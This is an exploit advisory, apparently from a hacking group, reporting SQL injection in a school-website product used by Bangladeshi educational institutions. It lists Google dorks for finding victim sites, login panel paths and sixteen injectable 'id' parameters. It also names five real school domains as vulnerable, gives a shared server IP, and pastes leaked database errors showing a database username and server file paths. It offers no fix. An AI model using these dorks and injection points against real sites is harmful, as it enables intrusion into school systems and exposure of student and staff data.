###############################################################
# Exploit Title : Soft IT Security Hululu IT Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : softitsecurity.com ~ hululuit.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : intext:''© Copyright 2019. Designed and
Developed by Soft IT Security'' site:edu.bd
intext:''© Copyright 2019. Designed and Developed by Hululu IT'' site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-soft-it-security-hululu-it-bangladesh-sql-injection.html
###############################################################
Admin/Teacher/Student Panel Login Path =>
/adminoperation/
/teacheroperation/
/studentoperation/
# SQL Injection Exploits :
**********************
/?v=home.jsp&id=[SQL Injection]
/?v=administrationdeatils.jsp&id=[SQL Injection]
/?v=allteacher.jsp&id=[SQL Injection]
/?v=allclark.jsp&id=[SQL Injection]
/?v=talentstudent-detail.jsp&id=[SQL Injection]
/?v=allstudent.jsp&id=[SQL Injection]
/?v=boardresultdetails.jsp&id=1%27
/?v=universitydetails.jsp&id=[SQL Injection]
/?v=talentteacher-detail.jsp&id=[SQL Injection]
/?v=academiccalender-details.jsp&id=[SQL Injection]
/?v=allevent.jsp&id=[SQL Injection]
/?v=allresult.jsp&id=[SQL Injection]
/?v=noticebord-detail.jsp&id=[SQL Injection]
/?v=uploadbook-details.jsp&id=[SQL Injection]
/?v=usefulllinkdetails.jsp&id=[SQL Injection]
/?v=checkclass.jsp&id=[SQL Injection]
###############################################################
# Example Vulnerable Sites =>
***************************
Note : (192.185.94.62) => There are 182 domains hosted on this server.
[+] birgardusafiaalimmadrasah.edu.bd/?v=administrationdeatils.jsp&id=3%27
[+] haripuralimmadrasha.edu.bd/?v=administrationdeatils.jsp&id=3%27
[+] tislamunionhighschool.edu.bd/?v=administrationdeatils.jsp&id=3%27
[+] haripurwomenscollege.edu.bd/?v=administrationdeatils.jsp&id=3%27
[+] jamunhndm.edu.bd/?v=administrationdeatils.jsp&id=3%27
###############################################################
# SQL Database Error :
*********************
Deprecated: mysql_connect(): The mysql extension is deprecated and
will be removed in the future: use mysqli or PDO instead in /home/birgardusafiaali
/public_html/DAL/DbConnect.php on line 8
Warning: mysql_connect(): Access denied for user 'birgardu_school'@'localhost'
(using password: YES) in /home/birgardusafiaali/public_html/DAL/DbConnect.php on line 8
Warning: fread(): Length parameter must be greater than 0 in
/home/haripuralimmadra/public_html/controller/function.php on line 220
###############################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###############################################################